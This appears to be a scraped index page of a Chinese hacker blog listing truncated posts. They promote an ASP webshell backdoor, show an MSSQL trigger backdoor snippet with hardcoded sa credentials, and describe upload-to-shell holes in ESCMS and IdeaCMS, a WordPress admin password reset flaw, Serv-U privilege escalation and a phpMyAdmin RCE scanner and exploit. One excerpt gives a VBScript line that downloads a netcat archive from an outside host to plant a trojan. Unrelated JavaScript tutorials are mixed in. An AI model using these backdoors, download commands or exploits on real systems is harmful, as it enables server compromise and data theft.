导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

[置顶] [原创]心动吧数据库防下载小工具

 这一个文章和我以前发布的一个文章正好成了一个对比(文章连接),如果上一次是茅。那么此次这个就是盾了.为什么这样说?请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。

例图:

[置顶] 心动吧警告:除20080508外并未发布其他版本

 先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。

[置顶] [原创]2009-1-18发布新版◆心动吧asp在线◆

心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门

 此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式

ESCMS 一个鸡肋的上传漏洞

blog : www.link0day.cn

转载请注明 thx

之所以说是鸡肋是因为。。。哎 我们还是看代码先:

在admin/downup.asp里面:

<!--#include file="check.asp" -->
...

WordPress < = 2.8.3 Remote admin reset password

# 鬼仔:可以直接重置管理员的密码,但是无法获得重置后的密码,因为重置后的密码是发到管理员信箱的,除非你把管理员的信箱也拿到。WordPress 的 trac 上也已经发了修复的信息Changeset [11797] - Changeset [11804] 。在用 WordPress 的同学来这里下载 wp-login.php 覆盖一下吧。ps:我今天下午就被某人日了一下,密码被重置,发到我邮箱了

sql2005上传木马的小技巧

Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://www.kanwi.cn/nc.zip",0  xPost.Send() 

IdeaCMS 0day +Exp2009

web site: www.link0day.cn

     转载请注明出处~为我那可怜的流量作出贡献 谢谢

     鸡肋的上传漏洞 不过对后台拿shell做了点贡献

upinc.asp:

...

Serv-U FTP Server v8 本地提权

受影响系统:

MsSql 触发器后门

明生注:一段由asp写的代码。。有时合用。只要别人不改sql密码

<%

On Error Resume next

Set conn=Server.CreateObject("ADODB.Connection") 

DSN="driver={SQL Server};Server=(Local)\GSQL;database=baby;uid=sa;pwd=lcx;"

conn.Open DSN

if conn.State=1 then 

response.write("成功") 

JavaScript 函数的声明与运用

作者: 心动吧明生KISS

转载请注明:http://www.abcxd.com

 

   函数我相信很多编写过程序的朋友都知道是什么来的!如果你实在不知道的话。我想你还是先去百度搜一下吧。因为解释起来肯定会给我解释得好。。

  这一节主要讲的 普通函数,参数个数可变函数,动态函数。下面开始

....

JavaScript 循环的辅助

作者: 心动吧明生KISS

转载请注明:http://www.abcxd.com

  

  上一节讲的循环。这一节讲的是如何在循环时退出循环和继续下一个循环,或者无限循环

  先看一下 break  语句的作用  

  例子: break用于退出某一个循环体-注意是某一个循环而不是所有

.......

JavaScript 三大循环

作者: 心动吧明生KISS

转载请注明:http://www.abcxd.com

  

  这一节主要介绍JavaScript中的三种循环  while()循环  do while()循环  for()循环。三者的区别在于哪里。那就请你跟着我来一步一步的解析他!学习他!运用他吧 (O_O!做广告呢??)

 

  先判断一下是否为真才会进入到执行语块,否则直接跳过

示例图:

    

....

pmaPWN! - phpMyAdmin Code Injection RCE Scanner & Exploit

<?php $list = array( '/phpmyadmin/', '/phpMyAdmin/', '/PMA/', '/pma/', '/admin/', '/dbadmin/', '/mysql/', '/myadmin/', '/phpmyadmin2/', '/phpMyAdmin2/', '/phpMyAdmin-2/', '/ph

....

分页:[«]5[6][7][8][9][10][11][12][13][14][15][16][17][18][19][»]

日历

<< 2014-4 >>

Sun

Mon

Tue

Wed

Thu

Fri

Sat

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

站内搜索

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved